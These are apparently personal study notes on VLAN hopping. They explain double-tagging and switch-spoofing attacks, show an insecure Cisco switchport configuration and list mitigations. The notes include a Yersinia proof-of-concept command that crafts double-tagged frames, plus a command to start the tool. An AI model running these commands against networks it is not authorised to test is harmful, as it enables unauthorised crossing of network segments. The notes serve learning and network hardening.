Link to this headingVLAN Hopping

Attack Types:

  • Double Tagging: By adding two different VLAN tags to the frame being transmitted it can trick the router into making the packet think it is sent from the VLAN specified by the first VLAN tag.
  • Switch Spoofing: The attacker imitates a trunking switch and sending the Tagging and Trunking Protocols to maintain the VLAN.

Link to this headingDouble Tagging

  • This is one way traffic and can not get data back.

Link to this headingAttacks

ICMP PoC:

yershina dot1q -attack 1 -source 0E:5C:49:19:32:BF -dest FF:FF:FF:FF:FF:FF -vlan1 0001 -piority1 07 -cfil 0 -12proto1 800 -vlan2 0020 -priority2 07 -cfi2 0 -l2proto2 800 -ipsource 10.0.1.31 -ipdest 10.0.21.11 -ipproto 1 -payload YERSHINIA -interface eth2

Link to this headingMitigation

Link to this headingSwitch Spoofing

  • Because of bad defaults this makes it possible for an attacker to do this attack including
    • allow DTP
    • negotiations of a trunk
    • VLAN 1 as its native VLAN

Bad Cisco Configuration:
show int gig0/13 switchport
- Administrative mode: Dynamic Auto
- Administrative Trunking Encapsulation: negotiate
- Operation mode: static access
- Negotiation of Trunking: On
- Access Mode VLAN: 1
- Trunking Native Mode VLAN: 1
- Trunking VLANS Enabled: All

show int trunk
- Verify that the gig0/13 port does not have a trunk set

Link to this headingAttacks

VLAN Hopping Concept, Attack example and Prevention

Inital start:

yersinia -I

Link to this headingMitigation

Set all of the unused ports on the switch to these configurations

  • Set the switchport to not be a access port
  • Set the switchport’s VLAN to an unused VLAN that does not have any connections to others
  • Disable DTP on the port
  • Set the native VLAN to one that is not used and does not go anywhere
  • The switchport port is administratively shutdown.
  • Never use VLAN 1 for anything – unless you must to integrate with other vendor devices.